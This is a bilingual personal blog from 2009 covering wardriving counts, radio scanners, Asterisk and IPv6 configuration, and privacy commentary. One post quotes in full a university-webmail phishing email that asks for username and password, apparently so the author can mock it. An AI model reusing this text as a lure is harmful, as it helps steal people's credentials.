Just heard on the scanner on one of the air traffic channels: "Request for sightseeing the Amsterdam Schiphol sector" describing (I think) the plane as a Cessna. It must be Sunday :)

The lightning detector had another active night.. and this time I slept right through it. Nothing like the high numbers on 26 May 2009 but still a peak.

So, the US is now also switched over to digital television. I found a nice compilation of analog shutdowns on youtube: 2009 DTV Transition: Analog TV Shutoffs in Los Angeles As They Happened and one particular WABCEndsAnalogShrtVrs061209 from ABC channel 7 New York. Some stations made a nice item out of it with a countdown and some just dropped their analog signal in the middle of a program. One big thing in the US is a lot of TV channels use their channel number in their branding (like ABC 7 for WABC above) and the US brother of DVB-T named ATSC has provisions for channels 'named' with a number which is not equal to the VHF/UHF frequency.
Update: Journal entry describing the end of analog tv broadcast: uneventful

Vandaag in het nieuws: Privacy ondergeschikt in paspoortwet - De Volkskrant : er is een nieuwe paspoortwet geaccepteerd door zowel de tweede als eerste kamer die enorme gevolgen heeft voor de privacy zonder dat het Malieveld heeft volgestaan met demonstranten. Terwijl de inhoud van dit wetsvoorstel volgens mij wel alle aanleiding geeft tot demonstraties aan de ene kant en serieuze vragen waarom de Nederlandse wetgever zich niet aan de Nederlandse grondwet wil houden aan de andere kant. Helaas hebben we in Nederland (nog) geen constitutioneel hof wat de wetgever op de vingers kan slaan. Uit het artikel

Alle Nederlanders boven de 14 jaar komen met hun vingerafdrukken, foto, sofi- of BSN-nummer in één databestand. Een bestand dat vrij toegankelijk is voor de inlichtingendienst en onder voorwaarden kan worden ingezien door justitie en politie.

Onder voorwaarden is natuurlijk waar het eerste aan getrokken gaat worden. Binnen de kortste keren zit elke rechercheur er ongestoord in te grasduinen.

Juist op de 80e geboortedag van Anne Frank moet iedereen zich toch realiseren wat een enorme gevaren voor de vrijheid van iedere Nederlander uitgaan van een dergelijk databestand. De enige manier om zo'n bestand te beschermen tegen misbruik is het niet aan te willen leggen.

De vraag is: als het gaat om veiligheid in Nederland, wie beschermt ons tegen de overheid?

Wardriving results 2 June - 12 June: 1509 new networks with GPS locations. I am now at position 14 in the WiGLE stats with currently 163418 new networks with GPS locations found.

Wat perl code om met Chipcard::PCSC het saldo en de laatste 5 transacties van een chipknip uit te lezen. Altijd handig als je toevallig een laptop met chipcard slot hebt. Het leuke is dat je ook kan zien wat het eigen nummer was van de chipautomaat waar je de transactie deed (SAM_ID) en het volgnummer (SAM_STAN) waarmee je kan zien waar je chipknip geweest is en kan zien hoeveel transacties automaten te verwerken krijgen. Perl code om een chipknip saldo te lezen en de laatste transacties.

Why go through all the trouble of installing a hardware skimming device when the ATM runs Microsoft Windows XP? Cybercriminals refine data-sniffing software for ATM fraud - Network World. This is scary stuff. This means an ATM which fully looks like the real thing and has no glued-on extensions can still be compromised.

A wonderful image of how the times are changing: the Hollywood Sign is still basically the same as in 1923 (it has been 'Hollywoodland' until 1949). But the drum antennas in the back are a sign of the new times were digital communications change the media landscape and threaten the old business models that Hollywood hangs on to.
Image from Hollywood Sign Wikimedia Commons. Found via Study: P2P customers are Hollywood's best friends—really! - Ars Technica

Computers are better at... doing what you program to, not what you want. There is still an older computer running which once hosted my mailman mailinglists for several domains. I shut down mailman on that machine and migrated the lists. But mailman was never removed from the startup files and the machine rebooted today, resulting in three years of mailman monthly reminders mailed at once. So if you were looking why you got old mailman reminders from virtualbookcase, this is why.

The Hurricane Electric IPv6 tunnelbroker is now also part of the Google over IPv6 project. Clients can access google services over IPv6:

koos@apollo:~$ host www.google.com 2001:470:20::2
Using domain server:
Name: 2001:470:20::2
Address: 2001:470:20::2#53
Aliases: 

www.google.com is an alias for www.l.google.com.
www.l.google.com has address 74.125.39.105
www.l.google.com has address 74.125.39.104
www.l.google.com has address 74.125.39.147
www.l.google.com has address 74.125.39.103
www.l.google.com has address 74.125.39.99
www.l.google.com has address 74.125.39.106
www.l.google.com has IPv6 address 2001:4860:a003::68

Go Hurricane Electric!

Wardriving results 19 May - 1 June: 4284 new networks with GPS locations. I got up to position 14 in the WiGLE stats. I've taken the wardriving box on a few detours on the home - work route and it went along on a few nice recumbent bicycle rides we did around the city.

Met de correcte frequenties voor de eerste en tweede kiestoon heb ik nu een Asterisk simulator Nederlandse telefooncentrale (voor 1995) geschreven. Dat heeft me wat over de beperkingen van Asterisk en vooral de functie WaitExten geleerd. Maar hij doet het!

After finding out the hopefully correct frequency for the old Dutch first and second dialtone in the Netherlands I tried to implement a simulator for making calls in the style of an old Dutch phone exchange (although I can't simulate the clicks and background noises.. yet). This made some downsides of the Asterisk extensions.conf 'programming' language show. But, after some grumbling and testing and testing I think I found the right way.

Goed idee: HackdeOverheid. Ik heb in ieder geval wel wat ideetjes over hoe de gemeente Utrecht meer gegevens beschikbaar kan stellen en hoe burgers daar creatieve dingen mee kunnen.

De tweede kiestoon is gevonden! Dankzij het museum voor communicatie en een vrijwilliger daar.

De eerste kiestoon bestond vroeger uit een combinatie van 150 Hz en 450 Hz.
De 2e kiestoon was 450 Hz bij electromechanische systemen en 425 Hz bij computerbestuurde centrales.
Bij het vervallen van de tweede kiestoon op 10-10-1995 bestonden geen electromechanische centrales meer en is de frequentie van de tweede kiestoon gebruikt voor de kiestoon.

Dus als ik dat wil nabouwen in Asterisk krijg ik iets in indications.conf als:

[nl-old]
description = Netherlands before 10-10-1995
ringcadence = 1000,4000
dial = 150+450
; second dial tone after area code
seconddial = 450
busy = 450/500,0/500
ring = 450/1000,0/4000
congestion = 450/250,0/250
info = 950/330,1400/330,1800/330,0/1000
stutter = 450/500,0/50

en moet ik Playtones(seconddial) gebruiken.
Update : En nu heb ik 2 andere meningen dat de eerste kiestoon alleen 150 Hz was.

Vandaag weer phishing mail in krom Nederlands, maar met het beter lopende Engelstalige origineel er vlak achter. Dat maakt vergelijken leuk:

Subject: UNIVERSITAIR UTRECHT WEBMAIL: Werk Uw E-mai lRekening bij

De beste E-mail Gebruiker,

 om uw proces van de Controle van de Rekening te voltooien, u moet
antwoorden en dit bericht uw Gebruikersbenaming en Wachtwoord
respectievelijk in de ruimte ingaan die onder deze e-mail wordt
verstrekt. U moet dit vóór volgende 48hrs van ontvangstbewijs van deze
e-mail doen, of uw postRekening zal van ons Gegevensbestand worden
gedesactiveerd en worden gewist. Uw rekening kan ook worden
geverifi�ërd bij:

gaat Gebruikersbenaming in (         )
Ga Wachtwoord in (         )

Dank u voor het gebruiken van UNIVERSITAIR UTRECHT WEBMAIL

versus

Subject: UNIVERSITY UTRECHT WEBMAIL : Update Your Email Account

Dear E-mail User,

To complete your Account Verification process, you are to reply  this
message and enter your Username and Password respectively in the space
provided below this email.You are required to do this before the next
48hrs of  receipt of this e-mail, or your mail Account will be
de-activated and erased from our Database. Your account can also be
verified at:

Enter Username (         )
Enter Password (         )

Thank you for using  UNIVERSITY UTRECHT WEBMAIL

Iemand enig idee welke automatische vertaler dit gedaan kan hebben?

In het kader van het Collectors*Net spelen met oude telefoons vroeg ik me af: wat was de toonhoogte van de oude 2e kiestoon in Nederland (die je ooit kreeg na het draaien van het netnummer). Weet iemand nog wat de frequentie was van die 2e kiestoon? Het wikipedia artikel over telefoontonen geeft wel een plaatje van een toon maar aangezien de gewone kiestoon daar weergegeven wordt als een 440 Hz (A) terwijl het 425 Hz is denk ik niet dat de frequentie van die E correct is.
Update 2009-05-29: Gevonden! De correcte eerste en tweede kiestoon

In the category spammers will try anything that looks like an e-mail address I repeatedly find variations on this message in the system logs:

greenblatt sm-mta[12385]: n4RAsgSa012385: <8006@idefix.net>... No such user in domain

Where they get that idea? Simply: On the Asterisk podcast per telefoon page is a sip url for sip:8006@idefix.net. It looks like an e-mail address: spam it!

When I bought some 1-wire sensors a while ago at Hobby boards I included the lightning detector in the order. I installed it indoors in the attic where it also counts the switch of the fluorescent lights, so it will probably work better in an outdoor weather station further away from interference. But, in the early hours of today there was a heavy thunderstorm over this country and it counted like crazy. The stated sensitivity is about 80 kilometers:

this lightning detector will be able to pick up lightning more than 50 miles away

With the 75000 lightning strikes reported in the Netherlands for that night, the numbers don't look that strange.

Remember way back windows 95 / 98 reporting "Windows was shutdown incorrectly" after you had to reset it for the Nth time because it crashed or hung?

I was reminded of this today when I wanted to remove a USB disk from a server so I tried to use the "Safely remove hardware" tool which did nothing. When I gave up and just unplugged the disk the warning window jumped up telling me to use the 'Safely remove hardware' tool to do that.

Annoying.

Ik zag van het weekend dat er weer een duif zit te broeden in de conifeer voor het raam van onze werkkamer. Het leek me wel leuk om tijdelijk een uitbreiding te maken voor mijn webcam site zodat iedereen het nest kan volgen zoals Vogelbescherming Nederland ook doet met hun Beleef de lente project. Helaas, geen werkende extra webcam beschikbaar. De extra webcam op het werk geeft rare usb errors en weigert.

Ik wilde zelf een trackback maken binnen de blog van de hcc!pc netwerkgroep maar ondanks de e-mail over de trackback of de bevestiging van een reactie kwam er niks in de reacties (tabel serendipity_comments). Nergens een foutmelding te vinden. Ik had zoiets van 'vroeger werkte het wel vanaf idefix'.. en bedacht me dat het misschien een probleem was met trackbacks en comments vanaf IPv6 adressen. Een kleine websearch later leverde bevestiging op: s9y: IPv6 (Bugs) • Serendipity. Met een simpel psql statement:

ALTER TABLE serendipity_comments ALTER COLUMN ip type varchar(64);

Is het probleem uit de wereld en kan ik ook vanaf ipv6 clients comments achterlaten en trackbacks maken.

De zoveelste phishing mail vandaag, maar een van de vragen die de phisher stelt aan de gebruiker viel me op als een bijzondere vorm van krom Nederlands, vermoedelijk afkomstig uit een automatische vertaler. Ik raak bijna benieuwd naar de originele bewoordingen hiervan:

Duur van de e-mail wanneer er sprake is zeker:

Maar of alle phishers gebruiken dezelfde originele teksten en vertaler, of ergens is een website waar adviezen en standaard-teksten aan phishers verkocht worden en staat deze tekst als geschikt voor Nederlandstalig.

Wardriving results 11-18 May: 338 new networks with GPS locations. No spectacular results, just almost daily wardriving on the bicycle commute.

A while ago Twitter was so broken for me it showed a plain error message, not even a fail whale:

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Temporarily Unavailable error was encountered while trying to use an ErrorDocument to handle the request.

Double fail!

Issue at work today: our mailserver was a bit overloaded. We run spamassassin in daemon mode to filter incoming mail that made it past the simple smtp checks. I noticed that mail to all staff members caused lots of waiting spamc processes from time to time which made mail pile up. A lot of the spamc processes were killed after a while because maildrop limits the time mail delivery can take. The big fix will be to increase the memory on the mail server, it is now swapping a lot. But the small fix was to tune spamd to not try to kill all its child processes when idle. Starting and stopping spamd child processes is an 'expensive' operation and mails to all staff members trigger a lot of simultaneous spamc calls, so it works better if a mail to a lot of local users finds already running spamd servers. I changed the setting to --max-spare=5 which made the load problem go away. We will still get a memory upgrade, but this simple processing fix also helped.

Wardriving results 26 April - 10 May: 4605 new networks with GPS locations at WiGLE. A few bicycle rides were planned around parts of Utrecht including a visit to previously uncharted parts of De Meern.

De supermarkt op de Uithof heeft 'mtn dew' wat de nieuwe naam blijkt te zijn voor 'Mountain Dew' wat ik wel eens in de verenigde staten of canada heb gedronken. Het blijkt de amerikaanse versie te zijn geimporteerd en gestickerd door American Food Service. Zo amerikaans dat ze bij de kassa van de supermarkt niet eens de scanner gebruiken maar gelijk een code intikken.

A first (for me): phishing mail (still from ADMIN at helpdesk.org) which has a web-link to 're-validate your mailbox' which points to a form at emailmeform.com. By the description of the service they will mail it to the form owner, but that owner can be a dropbox like for any phishing mail, just a bit harder to trace. The form asks for username, password and e-mail address.
Update: the phishers will have to do better, emailmeform has blocked the form and the account fast.

I run an irc server for a very small irc network, and in the past I tried to ipv6-enable it, but failed and let it at that mainly because that was in the hurry of trying to migrate services. Today, with all the ipv6 news from the ripe conference in mind I gave it a go again.

I use ircd-hybrid 7.2.2 (ubuntu package) which should support ipv6. But I never configured the IP to listen on, which makes it default to 0.0.0.0, v4-only. The fix was to define two IP addresses and ports:

listen {
	host = "1.2.3.4";
	port = 6667;
	host = "fe80::525f:c4ca";
	port = 6667;
}

Now the irc server is both ipv4 and ipv6 reachable, and updated in the dns. My client irssi needed an option /set resolve_prefer_ipv6 ON to actually use it, but now I have it working. One more service converted!

It seems the painters of the building were either very sloppy or aspiring vandals, they painted over the window right in front of my webcam on 7 April 2009. So I moved the webcam a bit.

The new scanner has been found: a Commtel COM225 scanner, which has a range from 25 MHz to 1300 Mhz and good scanning and receiving capabilities. A nice secondhand one, found via Marktplaats. Now I am programming lots of frequencies including Schiphol airport frequencies and other airport and eurocontrol frequencies. Commtel COM225 review at strongsignals.net.

An end to the continuing tale of the windows domain controller behind a firewall which I mentioned twice before. Finally I can log in with a reasonable speed. Kerberos over UDP (88/udp) was failing and I could not find out why because test traffic to port 88/udp made it. Peering long and hard at the wireshark dump I saw UDP fragmentation happening, but those fragments did not show up at the server. Another google search found How to force Kerberos to use TCP instead of UDP in Windows with the right registry key to force the client to use TCP, which fixed it. Finally.

I have been looking for a better radio scanner recently. For the amount of use it will get and what I want a second hand one is probably best. I also noticed the new ones on sale at the moment in the Netherlands are quite limited.
There are the simple ones with 50-100 channels which don't have the militairy air communications band that I want, and no 'tuning' option (tuning up and down the dial when looking for signals in a certain area).
Those are sometimes sold as 'church radio' in the Netherlands because somewhere in the years the rescue services moved to encrypted speech (C2000), frequencies 148.0125 to 149.0875 MHz and 153.0125 to 153.6875 MHz were opened especially for 'church radio': transmitting a church service (and nothing else). Most scanners will support this range. I really don't think the 'target audience' of church radio, people who want to hear a church service but are unable to go to church, usually elderly or sick people will be able to deal with all the little knobs and dials on the average radio scanner. I looked at the designs for church radio via Internet 'receivers' and those have a volume control and an on-off switch. The very advanced model has a 'channel' selector for choosing a church or gospel music.
The higher-end radio scanners sold new are really high-end with alphanumeric channel descriptions and trunk-tracking options. A bit too much for what I want, and too expensive.
So I'm browsing the secondhand scanner ads on a few websites. And everytime I see an offer that looks nice I look up the details of the offered scanner on the scanner reviews on the Strong Signals site which is a very good resource for finding out the options of scanners and comparing them.
I hope to find one for a reasonable price. In browsing the ads I learned about brands I haven't heard of before. There is Commtel which is actually from Uniden and GRE, making some Commtel models near copies of Uniden Bearcat models. There is also Realistic which seems to be the other name for Radio Shack scanners. Icom also makes receiver / scanners but those are out of my price range.

Wardriving results 7 - 25 April: 5152 new networks with GPS locations. The tour in another part of the country (near Arnhem) helped for almost half of that.

Interesting article The Great Brazilian Sat-Hack Crackdown in Wired on-line today. UHF-Satcom.com audio samples has some interesting samples of pirates using these frequencies and other interesting stuff (such as space shuttle audio). Time to dig up my radio scanner and see what I can find on these frequencies as listed at UHF Satellite reception - UHF-Satcom.
Update nothing, as this is outside the range of my trusty old Uniden Bearcat UBC120XLT, ranges 66-88, 108-174 and 406-512 MHz. Maybe time to find something better.

Good opinion article by The Register on the stance of UK police on cameras pointing their way: Police, Cameras, Inaction! - The Register with a great conclusion:

If the issue is not addressed soon – as the systemic problem we suspect it is - then the Police will only have themselves to blame for a massive loss of public belief in their integrity.

A good article with a readable view on what is going wrong with the police in England.

I did it: we now use Asterisk as home 'pbx'. I bought an OpenVox dual ISDN card via Novavox. Great company, Novavox: when it would take about a week to deliver the card they got in touch to make sure I could wait that long.

The choice for dual ISDN was because I still want to keep the outside line via KPN isdn: we are also using budgetphone but it was quite easy to find a phone number that was unreachable via budgetphone but reachable via KPN. And I want to keep using an ISDN set. So one port of the isdn card is configured as 'TE' card (terminal equipment) connected to KPN and one is configured as 'NT' card (network terminator) connected to the ISDN set. Asterisk does all the heavy lifting: outgoing call routing depending on number called and time of day. Incoming call routing, reacting to callerid and advanced answering machine.

Just in CNN (US edition) breaking news e-mail:

-- Ashton Kutcher is first to reach 1 million followers in Twitter contest with CNN.

I guess Twitter is now mainstream enough to generate its own breaking news. Ashton Kutcher first to reach 1 million in Twitter battle with CNN - CNN Technology which explains it: CNN news is big news for CNN.

Spring in the garden: the birds are quite busy and eat lots of seeds. My guess is they are more hungry now (time to build their nests) than in winter time. Everything is green and coming alive. Yesterday evening I could sit outside for a while.

Pasen: tijd voor het paastreffen van de nederlandse vereniging voor human powered vehicles, in het dagelijks gebruik beter bekend als de ligfietsers. Dit jaar ook weer op camping de Harskamperdennen in Harskamp.

Vrijdag er heen met een groepje uit Utrecht van de u-liggers, een leuke rit bij aangenaam weer.

Zaterdag ben ik zelf er op uit gegaan om mijn wardrive score bij te stellen door vanaf een andere plek dan gewoon te gaan fietsen. Het werd een fietstocht Harskamp, Otterlo, een stukje Arnhem, Wolfheeze en een puntje van Ede en weer terug. Nieuwe netwerken gevonden: 2640 (op 3021 totaal, bijzonder hoge verhouding voor wardriven). Net voor Ede brak de binnenkabel van de achterderailleur van mijn fiets, dus toen was de focus op terugkomen. Doordat de derailleur terugschoot zat ik achter in de hoogste versnelling en moest ik mijn kleinste voorblad kiezen om nog een beetje weg te kunnen rijden. Bij de fietsenmaker in Harskamp gestopt, die had nieuwe binnenkabels voor Shimano. Op de camping de nieuwe kabel er in gezet en toen bleek ook dat de buitenkabel aan het verslijten is. We kregen de binnenkabel er niet door. We, want als je in dit gezelschap aan je fiets gaat sleutelen heb je binnen de kortste keren hulp met goeie inzichten. Uiteindelijk zat het probleem in de laatste centimeters buitenkabel en die hebben we afgeknipt. Het geheel past nogsteeds en ik schakel nu weer stukken lichter. Maar die buitenkabel mag dus ook wel eens vervangen worden. Met mijn rijstijl slijt er toch van alles aan